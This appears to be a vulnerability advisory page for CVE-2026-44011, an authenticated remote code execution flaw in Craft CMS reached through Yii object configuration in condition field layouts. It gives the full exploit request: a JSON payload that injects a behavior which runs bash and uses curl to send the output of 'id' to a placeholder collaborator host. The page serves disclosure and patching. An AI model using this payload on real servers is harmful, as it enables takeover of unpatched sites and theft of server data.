CVE-2026-44011
Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
描述
We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list. This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original. The request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path. We were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path: ``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json { "elementType": "craft\\elements\\Category", "siteId": 1, "search": "", "condition": { "class": "craft\\elements\\conditions\\ElementCondition", "elementType": "craft\\elements\\Category", "fieldLayouts": [ { "as rce": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": [ "Psy\\Readline\\Hoa\\ConsoleProcessus", "execute" ] }, "typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/`id`\](https://yourcollaboratorservergoeshere/%60id%60/)"" } ] }, "on *": "self::beforeSave" } ] } } ``` ## Resources https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
如何修補 CVE-2026-44011
要修補 CVE-2026-44011,請將受影響套件升級到下列已修補版本。